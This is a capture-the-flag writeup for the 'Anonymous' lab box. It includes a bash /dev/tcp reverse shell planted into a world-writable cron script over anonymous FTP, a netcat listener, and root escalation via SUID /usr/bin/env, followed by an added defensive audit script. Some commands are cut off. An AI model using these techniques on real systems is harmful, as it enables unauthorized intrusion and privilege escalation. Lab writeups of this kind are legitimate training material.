Anonymous – a writeup

A quite minimalistic CTF from – let’s dive right in:

What does nmap say?

sudo nmap -sV

There we have the first answers to the challenge: 4 services are running, FTP on 21 and SMB on 139 and 445.

Now we need to look at the smb shares:

smbclient -L10.10.51.126

Next answer: the share we are looking for is pics.

Now we are looking for the flags.

Let’s see what ftp can do for us.


Anonymous login works.

That looks good. 3 files, we can read all of them and write to the shell script. Let’s download them and look into them.

get removed_files.log
get to_do.txt

to_do.txt only tells us that the admin is planning to block anonymous access. Good idea, but it doesn’t help.

So let’s cat out removed_files.log

cat removed_files.log

Not too interesting either. 

Let’s move on to the bash script.


Now things are beginning to make sense. The script writes into removed_files.log. Knowing that there were a lot of lines in the log file, we can assume that it is automatically and periodically called by a cron job.

We also know that we can write to the file. So let’s just plant a reverse shell into that script, set up netcat on our side and see if we get a shell when the cron job eventually fires on the target.

exec 5<>/dev/tcp/
cat <&5 | while read line; do $line 2>&5 >&5; done

And in our ftp session:


On our local machine we start our usual netcat listener

nc -l 1234

and wait …

And here we go. Let’s look around.

ls -la

We found the user flag


To get ideas on how to become root let’s use linpeas.

We start a webserver locally and upload the file to our target.

So on our local machine:

python3 -m http.server

And on the target machine:

chmod +x

In the SUID sections we find this line

-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env

With this we find something on

From there we use

env /bin/sh -p

and we are root.

cat /root/root.txt

So our root flag is
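
The two misconfigurations this box relies on, a script in the anonymous FTP directory that anyone can overwrite and the SUID bit on /usr/bin/env, can be checked for on your own hosts. The audit below is an added example, not part of the original writeup; the function names, the watchlist and the paths in the usage comment are assumptions.

```shell
#!/bin/sh
# Added audit example (not from the writeup). Names and watchlist are assumptions.
# Usage: sh audit.sh /srv/ftp /usr/bin/env /usr/bin/find ...

# Print regular files under DIR that "other" may write to (mode bit 0002).
# A cron-run script with this bit set can be replaced by any FTP user.
world_writable_files() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# Constructed watchlist: programs that start other programs, so a SUID bit
# on them passes the owner's privileges to whatever they launch.
LAUNCHERS="env sh bash dash find perl python3"

# Print each given path that has the set-user-ID bit AND is on the watchlist.
suid_launchers() {
    for f in "$@"; do
        [ -u "$f" ] || continue
        name=$(basename "$f")
        case " $LAUNCHERS " in
            *" $name "*) echo "$f" ;;
        esac
    done
}

# Combined report: $1 = directory served over FTP, remaining args = binaries.
# Exit status 0 means nothing was found, 1 means at least one finding.
audit() {
    ww=$(world_writable_files "$1")
    shift
    su=$(suid_launchers "$@")
    [ -z "$ww" ] || printf '%s\n' "$ww" | sed 's/^/WORLD-WRITABLE /'
    [ -z "$su" ] || printf '%s\n' "$su" | sed 's/^/SUID-LAUNCHER /'
    [ -z "$ww$su" ]
}

# Run the audit only when arguments are given on the command line.
if [ "$#" -gt 0 ]; then
    audit "$@"
fi
```

Either finding on its own is worth fixing: remove write access for "other" on anything a scheduled job executes, and drop the SUID bit from launchers with chmod u-s.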

